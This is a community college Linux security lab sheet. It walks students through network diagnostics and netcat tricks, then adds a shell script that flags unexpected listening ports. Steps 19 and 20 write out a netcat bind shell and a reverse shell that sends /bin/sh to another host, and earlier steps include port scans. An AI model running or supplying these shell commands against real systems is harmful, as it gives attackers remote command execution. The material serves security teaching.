Oakton Community College



CIS 290 – LINUX Security

Lab Exercise #4: Simple network review and hacking

1. Install under LINUX – netcat, nmap, Wireshark, firewall and configuration tools.

2. Display all interfaces: ifconfig -a, ifconfig eth0 down, ifconfig eth0 up

3. Display interface physical attributes: ethtool eth0

4. ping gateway

5. traceroute csc.oakton.edu

6. netstat -rn

7. arp -a

8. telnet csc.oakton.edu

9. netstat -an

10. Review /etc/sysconfig/network-scripts

11. route print, netstat -rn

Stupid network tricks using TELNET, netcat, nmap:

12. Simple client/server

nc -l 1111

nc 127.0.0.1 1111

This is a test

This is a test.

End the communication with ^C (Ctrl-C).

13. Simple file transfer

nc -l 1234 > test.out

echo Hi There!!!!! | nc 127.0.0.1 1234

14. Client to web server

echo -e "GET / HTTP/1.0\n\n\n\n" | nc -w 5 oakton.edu 80

15. Or getting a server header:

echo -e "HEAD / HTTP/1.0\n\n" | nc 10.0.2.100 80

16. Web Host

web.txt

Welcome to Bob's Webpage

Welcome to Bob's Webpage!!!!!!!!

 

cat web.txt | nc -l -v 80

Point browser to your system – .

17. Port scanning:

nmap -sT -p 1-65535

nc -z 127.0.0.1 1-1024

echo "quit" | nc -z 127.0.0.1 1-1024

echo EXIT | nc -z -w 1 127.0.0.1 1-1024

18. TELNET client/server

nc -t -l 2323 | /bin/bash

nc 127.0.0.1 2323

echo "Hi there"

logout

19. “Backdoor” shell (-e option not in LINUX, note step 18 as bypass)

nc -e /bin/bash -l 2023

nc -v 127.0.0.1 2023

or

telnet 127.0.0.1 2023

-e option not in LINUX

nc -l 2023 | /bin/bash provides access to bash builtin commands (no external executables).

20. “Reverse” shell (-e option not in LINUX)

Local machine: nc -n -v -l -p 1234

Remote machine: nc -e /bin/sh 10.0.2.100 1234

21. Telnet to discovered ports:

telnet
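
Steps 12 through 20 each leave an nc process listening on a TCP port, and the netstat -an output from step 9 is where that listener shows up. The script below is an added example, not part of the original lab sheet: it filters netstat -an output for TCP listeners whose port is not on an allowlist. The function names, the allowlist "22 631" and the sample netstat output are constructed for illustration.

```sh
#!/bin/sh
# Added example: flag TCP listeners that are not on an allowlist,
# reading Linux `netstat -an` output on stdin.

# Constructed sample of `netstat -an` output (not captured from a real host).
# Ports 2323 and 2023 are the listeners from steps 18 and 19.
sample_netstat() {
cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2023            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2323            0.0.0.0:*               LISTEN
tcp        0      0 10.0.2.15:22            10.0.2.2:51514          ESTABLISHED
tcp6       0      0 :::80                   :::*                    LISTEN
udp        0      0 0.0.0.0:68              0.0.0.0:*
EOF
}

# Usage: unexpected_listeners "22 631" < netstat-output
# Prints "port local-address" for every TCP socket in LISTEN state
# whose port is not in the space-separated allowlist given as $1.
unexpected_listeners() {
    awk -v allow="$1" '
        BEGIN {
            n = split(allow, p, " ")
            for (i = 1; i <= n; i++) ok[p[i]] = 1
        }
        $1 ~ /^tcp/ && $6 == "LISTEN" {
            # The port is the text after the last colon (works for IPv4 and IPv6).
            k = split($4, part, ":")
            port = part[k]
            if (!(port in ok)) print port, $4
        }
    ' | sort -n | uniq
}

# Run against the constructed sample; on the lab host use:
#   netstat -an | unexpected_listeners "22 631"
sample_netstat | unexpected_listeners "22 631"
```
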
